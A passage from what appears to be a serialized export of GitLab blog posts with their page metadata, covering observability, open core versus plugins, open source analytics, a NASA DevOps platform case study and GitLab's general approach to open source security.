efficiencies for computing resources, they can make it difficult to gain end-to-end visibility of software vulnerabilities, application performance, and quality assessments, and to be able to know where and how to affect change early on in the development lifecycle.\n\nDevOps improvements such as security and analytics are driving the adoption of observability, as is the increased need for compliance. With observability, according to 451 Research’s report, “one can query the data they have and ask any number of questions about a system, and, ideally, get an answer without having to predefine the exact data collected or tagging applied to answer the question.”\n\nIn other words, observability can provide a more flexible toolkit and enable a more active drill-down into what’s actually happening in the development lifecycle. With properly implemented observability, DevOps teams can, in real-time, identify a problem, fix it, benchmark the improvement, and measure it going forward – even in a cloud-native environment that is abstracted from knowledge of underlying systems. Having the ability to observe and measure your end-to-end DevOps efforts can reduce risk and provide greater control of cloud-native environments. \n\nDigital transformation leaders and laggards alike understand the need for observability. Nearly two-thirds of all respondents say they have adopted observability (41%) or have it in discovery/proof of concept (23%). Nearly a third plan to implement it within 12 to 24 months.\n\n“While it is great to see these adoption rates, the ultimate goal is to evolve observability’s inputs into actionable insights that positively impact the business,” says Sebastien Pahl, principal product manager at GitLab and co-founder of observability start-up OpsTrace (which was [acquired by GitLab in 2021](/press/releases/2021-12-14-gitlab-acquires-opstrace-to-expand-its-devops-platform-with-open-source-observability-solution.html)).\n\n## The benefits of observability\n\nIn modern application development, dev, sec, and ops teams share the responsibility of software development and delivery. In mature organizations, DevOps can extend to include stakeholders from compliance, legal, finance, and other departments with a direct stake in value delivery. Observability provides DevOps teams greater flexibility in how to utilize and share data across an organization.\n\nPahl likens observability to a flight crew being able to see, learn from, and react to all the data from instruments and dashboards on a plane as it is flying. “With observability, everyone can look at the same data through a different lens,” he says.\n\nObservability has significant benefits, including the following:\n\n- Developers can add code early in the development lifecycle for events they want to observe.\n\n- DevOps teams can move faster because they know when something is wrong and exactly what is wrong. They can fix problems once and move on.\n\n- Organizations can detect problems before customers do.\n\n- DevOps teams can assign certain alerts to specific individuals or teams so ops teams won’t be burned out responding to general alerts.\n\n- The inputs and metrics written through observability lay the foundation for AI and machine learning.\n\n## Observability and the DevOps Platform\n\nGitLab believes that [observability is foundational](https://opstrace.com/blog/gitlabobsvervabilityui) to a DevOps platform, and will make the capability available to all GitLab users. [Our vision](/direction/monitor/) is to make every GitLab project observable by default, with features that are easy to operate without specialized, expert skills. Teams can connect the dots between every deployment, incident, and other noteworthy events using and collaborating with telemetry data, which ultimately decreases the frequency and severity of production issues.\n\nGitLab’s observability capability is completely open-sourced and relies on open APIs such as Prometheus and OpenTelemetry so users don’t have to worry about vendor lock-in from instrumentation to alerting. It’s built into the GitLab DevOps platform to help you use the capability right away within your native workflow.\n\nLearn more about [observability and the DevOps Platform](https://about.gitlab.com/).\n\n\n\n\n\n\n\n",[685,845,9,1099],{"slug":4182,"featured":6,"template":689},"observability-is-key-to-cloud-native-transitions-and-modern-application-development","content:en-us:blog:observability-is-key-to-cloud-native-transitions-and-modern-application-development.yml","Observability Is Key To Cloud Native Transitions And Modern Application Development","en-us/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development.yml","en-us/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development",{"_path":4188,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4189,"content":4195,"config":4200,"_id":4202,"_type":14,"title":4203,"_source":16,"_file":4204,"_stem":4205,"_extension":19},"/en-us/blog/observability",{"title":4190,"description":4191,"ogTitle":4190,"ogDescription":4191,"noIndex":6,"ogImage":4192,"ogUrl":4193,"ogSiteName":673,"ogType":674,"canonicalUrls":4193,"schema":4194},"We're moving our observability suite to Core","Our gift to you for 2020: Metrics, logging, and tracing and alerting are coming soon to Core!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665651/Blog/Hero%20Images/gitlab-holiday-2019-blog-cover.png","https://about.gitlab.com/blog/observability","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're moving our observability suite to Core\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-12-16\",\n      }",{"title":4190,"description":4191,"authors":4196,"heroImage":4192,"date":4197,"body":4198,"category":10,"tags":4199},[927],"2019-12-16","\nHappy New Year to our developer community! We're moving a big portion of our [observability features](/blog/monitoring-team-update/) – custom metrics, logging, tracing and alerting – from our proprietary codebase to our open source codebase in 2020. We aim to complete this migration by early next year, and [you can follow along with our progress in this Epic](https://gitlab.com/groups/gitlab-org/-/epics/2310). While we're giving you the gift of 20/20 vision into your production environment as a thank you for all you've contributed, there are also three practical reasons as to why we're moving our observability suite to Core.\n\n## Why we're moving observability to Core\n\n### It's part of our stewardship model\n\nThe first reason being that it is our [stewardship](/company/stewardship/) mandate. Our product is open-core and our pricing model is transparent and buyer-based. A [buyer-based pricing model](/company/pricing/#the-likely-type-of-buyer-determines-what-features-go-in-what-tier) means we try to think about what type of buyer is going to get the most value out of a feature as we determine whether a feature belongs in our open source Core product or our paid versions of GitLab.\n\n\"If it's a feature for a single developer who might be working on his or her own individual project, we want that to be in Core because it invites more usage of those tools and we get great feedback in the form of new feature requests and developer contributions,\" says [Kenny Johnston](https://about.gitlab.com/company/team/#kencjohnston), director of product, [Ops](/direction/ops/) at GitLab. \"It's an important part of our product philosophy to ensure we keep developer focused features in our Core product.\"\n\n### Observability belongs in Core\n\nOur mission is to provide an end-to-end DevOps solution for developers that is also open source, and we were falling a bit short on the Ops side of things by keeping essential observability tools in a proprietary codebase.\n\n\"Before this move, If you were using Gitlab's open source version, you could attach a Kubernetes cluster and deploy applications to it, but then your ability to observe how your users are interacting with it in production was limited,\" says Kenny. \"Now, you can get out-of-the-box metrics, create customized ones, get access to log tailing and searching and see traces – all within GitLab. Those were all non-existent in Core previously.\"\n\nThe fact is, the three pillars of observability: [custom metrics](/direction/monitor/platform-insights/), [logging](/direction/monitor/#logging), and [tracing and alerting](/direction/monitor/platform-insights/), are fundamental to the complete DevOps lifecycle even for those single developers working on their own projects. That means they belong in our Core product.\n\n### We want your input on monitoring\n\nThe third reason is that we value your contributions, and we're hoping that by making our observability tools open source you will make valuable improvements to the code so that other developers can benefit from your insight. This is the gift you offer us every day, and so now we have a wishlist for you.\n\n## The three pillars of observability are on our wish list\n\n### Custom metrics\n\nGitLab has a strong integration with Prometheus that allows users like you to [monitor key metrics for applications](/direction/monitor/platform-insights/) deployed on Kubernetes or a different [Prometheus server](https://docs.gitlab.com/ee/user/project/integrations/prometheus.html#manual-configuration-of-prometheus), without ever leaving our interface. Common reporting metrics include system metrics such as memory consumption, as well as error and latency rates. GitLab will automatically detect certain metrics from our metrics library, and you can customize these metrics based on your needs.\n\nBut there is always room for improvement. If you see something that you think needs improvement with metrics, or any of our observability features, please submit an issue or a merge request, or even contribute changes to our open source codebase.\n\n### Logging\n\nYou can see [logs of running pods on your Kubernetes clusters](https://docs.gitlab.com/ee/user/clusters/agent/index.html), without the hassle of having to toggle between applications, since logging is integrated within GitLab. But our [current logging capabilities](/direction/monitor/platform-insights/) are best described as log tailing. Users can see what is essentially a live stream of their logs within GitLab. Is our log tailing providing enough observability into the health of your deployed Kubernetes clusters? We're hoping you can help us innovate new ways to make our logging tools more valuable.\n\n\"I would love to have more insight into how users want to interact with [logging], if log tailing is sufficient, how much they want to move back and forth,\" says Kenny. \"Some of those contributions can come in the form of commentary or issues being created, but people could also take it upon themselves to adjust that view so that is better suited to their needs when tailing a log.\"\n\n### Tracing and alerting\n\nWhile there are certain metrics that are commonly reported about a deployed application — such as how much CPU is being consumed, the speed to process a request, etc., [tracing](https://docs.gitlab.com/ee/operations/tracing.html) allows you to monitor deployed applications in more depth and be alerted to any issues with the performance or health of the application. But, like logging, our [tracing and alerting capabilities are in the earliest stages](/direction/monitor/platform-insights/).\n\n\"Today, our tracing is fairly minimal,\" says Kenny. \"We have an embedded UI for Jaeger, but we'd love to see contribution from members of the Jaeger community for more deep integration into GitLab. Maybe developers and operators who use GitLab would like to see more of the Jaeger UI experience directly in GitLab.\"\n\nOur alerting capabilities are also a bit clunky. You have to define it directly in the UI and code configuration. By better uniting our tracing integration with Jaeger with our alerting capabilities, we could create a more synchronized user experience.\n\n## Closing the DevOps loop\n\nIn order for GitLab to function as an end-to-end DevOps solution, our users must be able to apply our ticketing system all the way from issue to production.\n\n\"I'm really interested in the use case where people are creating issues for alerting when something goes wrong with their production environments, and then how they interact with observability information in the incident management issue itself,\" explains Kenny.\n\nPerhaps you need an issue template for incidents that will show a particular log line. Or there might be a custom metric that is so commonly used, it ought to be added to our metrics library.\n\n\"If you don't like the way that your alerting is set up, or you don't like the way that your log system is aggregated we'd love your contributions. If you don't like how metric charts, logs or traces are displayed in fire-fighting issues we'd love your contributions. GitLab is open source. You can contribute improvements to your observability tool just like you can the rest of your developer platform,\" says Kenny.\n\nSo go for it!\n\nThe three pillars of observability on GitLab are ripe for iteration, and there is still so much creative potential for each of these tools. We look forward to seeing what you come up with in 2020!\n",[9,803],{"slug":4201,"featured":6,"template":689},"observability","content:en-us:blog:observability.yml","Observability","en-us/blog/observability.yml","en-us/blog/observability",{"_path":4207,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4208,"content":4214,"config":4219,"_id":4221,"_type":14,"title":4222,"_source":16,"_file":4223,"_stem":4224,"_extension":19},"/en-us/blog/open-core-is-worse-than-plugins",{"title":4209,"description":4210,"ogTitle":4209,"ogDescription":4210,"noIndex":6,"ogImage":4211,"ogUrl":4212,"ogSiteName":673,"ogType":674,"canonicalUrls":4212,"schema":4213},"Open core is worse than plugins... and that’s why it’s better","Learn why GitLab's decision to opt for the \"worse\" choice has been a great success.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681581/Blog/Hero%20Images/gitlab-linux-ibm-z-redhat-openshift.jpg","https://about.gitlab.com/blog/open-core-is-worse-than-plugins","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Open core is worse than plugins... and that’s why it’s better\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2022-07-14\",\n      }",{"title":4209,"description":4210,"authors":4215,"heroImage":4211,"date":4216,"body":4217,"category":682,"tags":4218},[1235],"2022-07-14","\nOpen core is obviously a horrible approach to creating a product with an ecosystem of extensions and integrations: There are no proper protocols and interfaces. Instead, anyone can just add their integration to the code base and even adjust said code base to their needs if it doesn’t fit.\n\nSo why have we been using the “Worse” approach at GitLab for many years now, with great success? Because [Worse is Better](https://www.dreamsongs.com/RiseOfWorseIsBetter.html) (a term conceived by [Richard P. Gabriel](https://en.wikipedia.org/wiki/Richard_P._Gabriel)). Of course, it turns out that “Worse” is actually even better than Worse is Better suggested.\n\nGabriel’s [original argument](https://www.dreamsongs.com/RiseOfWorseIsBetter.html) was that (slightly) intrinsically worse but simpler and easier to implement software has better survival characteristics than better-designed, more complex software, and thus will consistently win in the marketplace.\n\nAt GitLab, we have found that this is basically true, which is why we, for example, favor “boring technology,” even if it might not be the best possible solution for a given scenario. But this doesn’t tell the whole story: It turns out that such software is not just more successful, it also ends up being qualitatively better in the end.\n\n## Worse is even better\n\nIt is important to note that Gabriel’s original argument was not that **bad** software wins out. In fact, both his “worse” and his “better” have the same qualities:\n\n1. Simplicity, of interface and implementation\n2. Correctness\n3. Consistency\n4. Completeness\n\nHowever, his “worse” and his “better” have slightly different weights for the value placed on these characteristics, with the (worse) New Jersey school favoring simplicity of implementation over simplicity of interface, whereas the (better) “MIT” school favors simplicity of interface, even at the cost of a more complex implementation.\n\nIf a simple interface can be achieved with a simple implementation, both schools agree, the difference comes when there are tradeoffs to be made.\n\nWhat makes worse even better, and what Gabriel didn’t take into account even in later [versions](https://www.dreamsongs.com/WorseIsBetter.html), is the tremendous value of feedback loops. Being early doesn’t just let the New Jersey approach win in the marketplace, it also allows it to collect feedback much, much earlier and much more quickly than the MIT approach.\n\nPaul MacCready won the first [Kremer prize](https://en.wikipedia.org/wiki/Kremer_prize) not by initially setting out to build the best human-powered aircraft, but by building the one that was easiest to repair in order to gather feedback more quickly. While other teams took a year or more to recover from a crash, his plane sometimes flew again the same day. And so it was exactly this willingness to lose sight of the prize that resulted in him winning it.\n\nIn much the same way, it is these quick feedback loops that a “worse” approach enables, started much earlier, that eventually lead to a better product.\n\n## The problem with plugins\n\nAt least since the success of Photoshop, a proper plugin interface has been recognized as _The Right Way_ to make software both more compelling for users and less easy to leave behind by creating a third-party ecosystem that provides useful functionality without the vendor having to provide all of that functionality themselves.\n\nIt was so successful that systems like OpenDoc took the idea further to be just a set of plugins, with no real hosting application. None of these systems succeeded in the marketplace.\n\nOne of the reasons is that good plugin interfaces are not just hard, but downright fiendishly difficult to develop. The basic difficulty is that it is hard to get the balance right: what to expose, what to keep hidden, how to provide functionality. But that’s not the fiendish part.\n\nThe fiendishly difficult part of plugin API development is that the very things you need to do to handle the difficulties make the task even harder: You need to design more carefully, you need to make interfaces stable, you can only iterate them slowly.\n\nIn short: You face a chicken-and-egg problem of premature abstraction. In order to make a good plugin API, you need to see it being used, but in order to see how it is being used, you need to first have it. This dynamic delays initial availability and makes feedback cycles slower.\n\nSoftware is not the only domain facing this problem. Parks, for example, often have official paths that don’t match where people actually want to go. One group of landscape architects solved this by doing less: They didn’t put in any walkways in a park they had created. Instead, they waited for trails to materialize as people walked where they needed to walk. Only after those trails had materialized did they pave them, making them official.\n\nLast but not least, a plugin interface means that the final product the user sees, consisting of both the core application and all the plugins, is not as well-integrated as it could be. The value proposition of “here is a box with tools, have fun!” sounds a lot more enticing to developers than it does to end users, even when those tools are, by themselves, best of breed.\n\n## Open core\n\nOpen core, on the other hand, sounds like exactly the wrong approach, certainly from a software engineering point of view, as there are no defined black-box boundaries, but also from a business point of view as there doesn’t seem to be an actual mutually reinforcing ecosystem.\n\nHowever, the open core approach is great for end users, both for adopters who just want to use it and also adapters who need to tailor the system to their use case. And in the end, it is the end users that count.\n\nFor adapters, the system is immediately hackable. There is no need to wait for the vendor to provide a plugin interface in the first place, and no need to wait more for the vendor to make that plugin interface provide the functionality needed for a particular application some time in the future, if ever. Even if changes to the core application are required, this is at least possible.\n\nSince there is more adaptation activity happening sooner, the system becomes better at accommodating adaptation needs, and a virtuous cycle ensues.\n\nFor adopters, the benefits are multifold: First, the system gets more functionality more quickly, which is always good. Almost more importantly, this functionality is integrated by the vendor and provided as an integrated whole. There is a reason single-vendor office suites succeeded where OpenDoc’s toolbox approach failed.\n\nThat said, an open core approach does require solid engineering, a good architectural base, and ongoing vigilance. As [explained earlier](https://thenewstack.io/why-were-sticking-with-ruby-on-rails-at-gitlab/), we believe that Ruby on Rails provided us with a good starting point to build GitLab as a solid modular monolith, both approachable and well-structured. With that as a starting point, good design is encouraged by example, rather than being enforced by strict API boundary. Enforcement, on the other hand, comes in a more human form as pull requests are considered, shaped, and approved or rejected.\n\nSo boundaries still exist, but instead of being brick walls to crash against, they are low fences that are noticeably present, but can be stepped over if needed.\n\nAnd although these low fences are considered “worse” than the brick walls we are used to, they actually lead to better outcomes for everybody involved.\n",[685,9,267],{"slug":4220,"featured":6,"template":689},"open-core-is-worse-than-plugins","content:en-us:blog:open-core-is-worse-than-plugins.yml","Open Core Is Worse Than Plugins","en-us/blog/open-core-is-worse-than-plugins.yml","en-us/blog/open-core-is-worse-than-plugins",{"_path":4226,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4227,"content":4232,"config":4237,"_id":4239,"_type":14,"title":4240,"_source":16,"_file":4241,"_stem":4242,"_extension":19},"/en-us/blog/open-source-analytics",{"title":4228,"description":4229,"ogTitle":4228,"ogDescription":4229,"noIndex":6,"ogImage":900,"ogUrl":4230,"ogSiteName":673,"ogType":674,"canonicalUrls":4230,"schema":4231},"4 Examples of the power of open source analytics","Our Data and Analytics team manager reflects on how open source and radical transparency has benefited analytics work at GitLab.","https://about.gitlab.com/blog/open-source-analytics","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"4 Examples of the power of open source analytics\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Taylor Murphy\"}],\n        \"datePublished\": \"2019-04-15\",\n      }",{"title":4228,"description":4229,"authors":4233,"heroImage":900,"date":4234,"body":4235,"category":10,"tags":4236},[3753],"2019-04-15","\nOne of the great parts of working for a company with such a strong [open source](/solutions/open-source/) ethos is that\nyou're able to apply this philosophy to other parts of the company. We on the Data Team\nhave worked hard to embody the [values of GitLab](https://handbook.gitlab.com/handbook/values/),\nparticularly collaboration and transparency.\n\nIt starts by defaulting to public for everything. Our [primary code repository](https://gitlab.com/gitlab-data/analytics/)\nis public and MIT licensed, meaning anybody can contribute or just take what they find useful.\nOur code, issues, and [documentation](/handbook/business-technology/data-team/) are public.\n\n## This radical transparency has had several positive side effects\n\n### The effect I'm most excited about is having people contribute to our codebase.\n\nWhen we were migrating to Snowflake for our data warehouse, we needed to convert our SQL code\nthat was specific to PostgreSQL to a Snowflake-compatible format.\nOne of the models in our codebase [generates a table](https://dbt.gitlabdata.com/#!/model/model.gitlab_snowflake.date_details) of dates and related metadata such as day of year, week of year, quarter, etc.\nAn external contributor, [Matthias Wirtz](https://gitlab.com/swiffer), who had been following our\nproject and the [Meltano](https://meltano.com/) project, took it upon himself to make the\nupdate and create a merge request in our project. We went back and forth a bit with code review\nand testing, but eventually [it was merged](https://gitlab.com/gitlab-data/analytics/merge_requests/476/diffs) and we now rely on this code today!\n\n### Another great benefit is that it makes conversations easier within the analytics community.\n\nA key part of our data stack is data build tool, or [dbt](https://www.getdbt.com/) for short.\nThis is a powerful open source project that makes version controlling and executing SQL code easy.\nThe company behind the project, [Fishtown Analytics](https://www.fishtownanalytics.com/),\nhosts a great community on [Slack](https://slack.getdbt.com/). I've been able to answer basic\nquestions about project structure, documentation, and testing just by linking to our codebase and\n[dbt-generated docs](https://dbt.gitlabdata.com)\ncountless times, and the feedback is always positive. We see people who are shocked that\nwe're so open but also appreciative that they can poke around a production codebase with ease.\n\n### An additional benefit that we've seen is that by putting everything out in the open we're helping to drive the industry forward.\n\nIt's one thing to say \"Here's what we're doing, but sorry you can't see the code\" versus\n\"Here's what we're doing, here's _how_ we're doing it, and what are your ideas to make it better?\"\nThe latter invites people into the conversation to build upon ideas and others' creations.\n\n### The last piece I want to highlight is the idea that the actual code that you use for analytics isn't your company's competitive advantage.\n\nYou could know exactly how we move, store, model, and analyze our data, and its utility for a\ncompetitor would primarily be to get their own analytics off the ground.\nThe real value is the data itself and the decisions people make from the results of your analyses.\nWe, of course, protect our data and our customers' data, but there's no reason why people\nshouldn't be able to see how we _use_ that data to make decisions. And, being a transparent company,\nwe're very open about the decisions we make as well.\n\nOverall, we're seeing the same transformation that software engineering underwent with the [DevOps\nmovement](/topics/devops/) happen in the analytics world, only with about a five-year lag.\nMore open source tools are being created for data teams every day, and more people are sharing\nhow they build their stacks and analyze their data. At GitLab, we're betting that our [core values](https://handbook.gitlab.com/handbook/values/)\ncan bring emergent positive benefits to every part of a company, including data teams!\nWe look forward to collaborating with you as this industry changes and grows!\n",[267,803,9],{"slug":4238,"featured":6,"template":689},"open-source-analytics","content:en-us:blog:open-source-analytics.yml","Open Source Analytics","en-us/blog/open-source-analytics.yml","en-us/blog/open-source-analytics",{"_path":4244,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4245,"content":4251,"config":4257,"_id":4259,"_type":14,"title":4260,"_source":16,"_file":4261,"_stem":4262,"_extension":19},"/en-us/blog/open-source-nasa-gl",{"title":4246,"description":4247,"ogTitle":4246,"ogDescription":4247,"noIndex":6,"ogImage":4248,"ogUrl":4249,"ogSiteName":673,"ogType":674,"canonicalUrls":4249,"schema":4250},"MRI Technologies used GitLab for unified toolchains to NASA","Live from GitLab Commit: NASA will be flying Kubernetes clusters to the moon and GitLab is helping.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678434/Blog/Hero%20Images/nasagitlab.jpg","https://about.gitlab.com/blog/open-source-nasa-gl","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Commit: How MRI Technologies used GitLab to bring unified toolchains to NASA\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2019-09-17\",\n      }",{"title":4252,"description":4247,"authors":4253,"heroImage":4248,"date":3714,"body":4254,"category":10,"tags":4255},"GitLab Commit: How MRI Technologies used GitLab to bring unified toolchains to NASA",[1273],"\nNASA can put [Rovers on Mars](https://mars.nasa.gov/mer/), but a complex legacy software system proved a bit of a challenge. Speaking at GitLab Commit in Brooklyn, [Marshall Cottrell](https://www.linkedin.com/in/marshall-cottrell-27b385181) of [MRI Technologies](https://www.mricompany.com) explained how the company teamed up with NASA to launch the space agency into the era of modern application development using Kubernetes and GitLab.\n\nIn September 2018 MRI began work on a new software development platform called APPDAT. \"It's the only platform taking a totally 'fresh approach' to application development and data science activities within the Agency,\" Marshall said. The team's challenge was to update an Oracle-based legacy SCM solution using open source technologies and APIs. At the time NASA had no toolchains to support CI/CD during development and lots of silos of information. \"There was no mechanism for us to disseminate innovations, best practices, or what we learned,\" Marshall said. NASA needed a unified toolchain and platform for software delivery. \"GitLab was chosen as the platform source control management solution because it is the only product in this space that integrates all stages of the DevSecOps lifecycle.\"\n\n## A laser focus helps\n\nPerhaps not surprisingly MRI had ambitious goals for APPDAT, Marshall explained. The overarching hope was to build an automated DevOps platform that served as the single source of truth. Until MRI got involved, NASA had no way to actually \"own\" the software development process; teams operated in a piecemeal fashion, choosing contractors and solutions based on situational needs rather than looking at the big picture. Those decisions left NASA subject to potentially \"abusive behavior,\" Marshall explained.\n\nSo MRI laid out a number of goals:\n\n- Empower teams to fully manage the resources they support\n- Demonstrate and promote fully open project management and collaboration\n- Create a sandbox for protoyping with no barriers to entry\n- Assemble an API and data economy that would eliminate silos and promote reusability\n- Establish platform-level security controls with a goal of \"compliant by fault\"\n\nTo get there, MRI emphasized collaboration and tried to reach out to the \"forward-leaning\" customers and individual civil servant developers, engineers and researchers who were eager to contribute. The team adhered strictly to cloud native, Zero Trust and open source approaches and, in the end, came up with a Kubernetes platform that met the space agency's needs for today and in the future. The technology choices were important, but so was the time spent laying the groundwork for a culture change. \"Many modernization proposals try to meet everyone where they're at,\" Marshall explained. \"A more opinionated approach allows us to provide a succinct and unified toolchain that all parties can contribute to, evolve, and improve over time.\"\n\nToday the 61-year old space agency has a modern platform where developers can easily collaborate with non-developers, no complex tooling is required, and context switching is a thing of the past, Marshall said. APPDAT syncs from the agency's existing SCM solutions so everyone was able to continue to use the same tools.\n\nPerhaps most exciting, NASA's plans to have astronauts established on the moon by 2024 as part of the [Artemis program](https://www.nasa.gov/what-is-artemis). That will include a data center, and Marshall is confident Kubernetes will be part of the launch.\n\n\"We’ve already begun to change minds at NASA and you can do it at your enterprise too,\" Marshall said. His last best advice: Play the long game, only innovate when it makes things easier, and a bottom-up approach is an easy way to make friends.\n\nWatch Marshall's entire presentation here:\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/RsUw4Ueyn-c\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen>\u003C/iframe>\n\nDon't miss out on the chance to network with others on the same DevOps journey. Get your tickets to [Commit London on October 9](/events/commit/).\n\nCover image by [David Torres](https://unsplash.com/@djjabbua) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[4256,1038,910,9,1376],"GKE",{"slug":4258,"featured":6,"template":689},"open-source-nasa-gl","content:en-us:blog:open-source-nasa-gl.yml","Open Source Nasa Gl","en-us/blog/open-source-nasa-gl.yml","en-us/blog/open-source-nasa-gl",{"_path":4264,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4265,"content":4271,"config":4277,"_id":4279,"_type":14,"title":4280,"_source":16,"_file":4281,"_stem":4282,"_extension":19},"/en-us/blog/open-source-security",{"title":4266,"description":4267,"ogTitle":4266,"ogDescription":4267,"noIndex":6,"ogImage":4268,"ogUrl":4269,"ogSiteName":673,"ogType":674,"canonicalUrls":4269,"schema":4270},"How we manage open source security software","Open source software presents unique security challenges. Here’s what you need to know.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681227/Blog/Hero%20Images/opensourcesecurity.jpg","https://about.gitlab.com/blog/open-source-security","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we manage open source security software\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Loveless\"}],\n        \"datePublished\": \"2020-04-10\",\n      }",{"title":4266,"description":4267,"authors":4272,"heroImage":4268,"date":4274,"body":4275,"category":865,"tags":4276},[4273],"Mark Loveless","2020-04-10","\n\n_In February 2020, Harvard University and the Linux Foundation’s Core Infrastructure Initiative released a joint report, [Vulnerabilities in the Core](https://www.hbs.edu/news/releases/Pages/census-open-source-software-security.aspx), looking at security challenges in the open source software world. Open source software has [taken over the world](https://techcrunch.com/2019/01/12/how-open-source-software-took-over-the-world/), but with its astronomical popularity comes the potential for huge risk. We thought this was an excellent opportunity to ask senior security engineer [Mark Loveless](/company/team/#mloveless) for his thoughts on open source security, how GitLab approaches it, and some ways you can move the bar forward in your company._\n\nI was quite pleased that an institution like Harvard would be taking a hard look at open source software. Security is often difficult for people to understand how much it impacts real lives. Nerd types (the InfoSec community) try to communicate to the \"normals\" to explain to them why they need to care about security. Granted, this barely tracks on the radar of many people in our own field, as some of the Infosec community think they already know it.\n\n## Inside our security plan\n\nWe have dedicated people at GitLab looking at our own code, trying to find security flaws. We have a group that deals with bug submissions coming in from Hacker One. But we also have people at GitLab looking for security flaws in various open source packages that are a part of the \"supply chain\". These outside packages may be used in the GitLab product. When one of these packages has a flaw in it, there can be impact to both open source projects like ours, as well as closed source projects. It may be surprising to learn that a lot of closed source projects use open source libraries.\n\nUsing an open source library to complete a coding project is not uncommon and in fact highly encouraged. For example, reading through the Internet standards for protocol implementation of HTTPS could not only be daunting, but coding it without the experience of writing security-related code is ill-advised unless you are an expert in the field. Including a security-related open source library in your project can solve that issue. But speaking of something as complex as HTTPS, for example, brings up another problem - implementation.\n\n## The implementation issue\n\nA flaw is found in an open source package. Hundreds of applications are using the open source package with the vulnerability, yet only half of these applications are exploitable via the flaw. Why? A lot of times it comes down to implementation.\n\nWhen given a choice between one setting versus another, there are ramifications to consider when deciding which might make the most secure implementation. These choices have consequences. One choice could impact performance - especially at scale. Another choice could leave things more vulnerable. There are compliance issues to consider. All of these items need to be weighed carefully.\n\nIt’s a core thing at GitLab to be sure that we implement things in ways that are more secure. I’ve worked at numerous software vendors over the years and GitLab is one of the largest. Most organizations of this size do not release code nearly as often as we do, and most do not take security as seriously. When I started working here, I was pleasantly surprised at how much security was part of the process.\n\n## Trust the transparency\n\nWe’re not only a [transparent company](https://handbook.gitlab.com/handbook/values/#transparency), we’re an open core company. This means that the core part of our product is open source and free to download and use, while we have a number of paid options for increased features and services. This applies to everything in our company and is an added benefit when it comes to security. We’re very open about disclosing security problems. For example, when a bug affects our open source code any future code commit to fixing the problem also shows the vulnerability. At some of my other employers there were often discussions about the \"exposure\" of the company when revealing a vulnerability, and a pull between departments about how much to disclose. Sometimes those disclosure discussions turned political. At GitLab that problem is eliminated as we’ve made the commitment to completely disclose the issue. We’ve even extended this to the parts of our offerings that are not a part of that core product. It is in the best interest of our users to have complete information about the security of GitLab.\n\n## The role DevSecOps plays\n\nWhen it comes to writing code, bugs - security-related or not - are the nature of the beast. The trick is to expect it and plan for it. Here at GitLab we’re doing the DevSecOps thing: extraordinarily rapid development while retaining a [focus on security](/solutions/security-compliance/). There is a tendency here for our engineers to take the time and do things right. Bugs can impact performance and availability and security bugs are no different. This is why GitLab works so hard on delivering code that is as clean and secure as possible. When we manage to do that it’s a win/win. When bugs do occur, we have developed processes to deal with them which includes updates to our development processes if necessary to help improve the entire process.\n\n## Game on\n\nIf you’re trying to up your open source security game you already know it’s a constant work in progress. We encourage open source as much as possible! Open source or not, here are a few things that we’ve done at GitLab that apply to security:\n\n- You have to have security people involved in the company. Any security team needs to have people who have the capacity to analyze and handle flaws in code, whether the code is internal or external.\n- The security people need to be on staff. They need to have the freedom to do their jobs.\n- Upper management has to buy into security. If security is top of mind for upper management it will be easier to get things done at the department level.\n- **Lose the culture of shame and punishment for security problems.** It exists in lots of places and it’s why people start trying to hide bugs. There should not be a carrot and a stick involved in security.\n- Make security something that’s muscle memory and you’ll be golden.\n\n\nCover image by [Wolfgang Hasselmann](https://unsplash.com/@wolfgang_hasselmann) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[9,865,3091],{"slug":4278,"featured":6,"template":689},"open-source-security","content:en-us:blog:open-source-security.yml","Open Source Security","en-us/blog/open-source-security.yml","en-us/blog/open-source-security",{"_path":4284,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4285,"content":4291,"config":4296,"_id":4298,"_type":14,"title":4299,"_source":16,"_file":4300,"_stem":4301,"_extension":19},"/en-us/blog/open-source-tools-for-citizen-journalists",{"title":4286,"description":4287,"ogTitle":4286,"ogDescription":4287,"noIndex":6,"ogImage":4288,"ogUrl":4289,"ogSiteName":673,"ogType":674,"canonicalUrls":4289,"schema":4290},"How the Colmena project uses GitLab to support citizen journalists","Find out why the Colmena project, a GitLab Open Source Partner, relies on a DevSecOps platform to develop and deliver open source tools for citizen journalism.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683016/Blog/Hero%20Images/citizenjournalism.png","https://about.gitlab.com/blog/open-source-tools-for-citizen-journalists","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How the Colmena project uses GitLab to support citizen journalists\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan 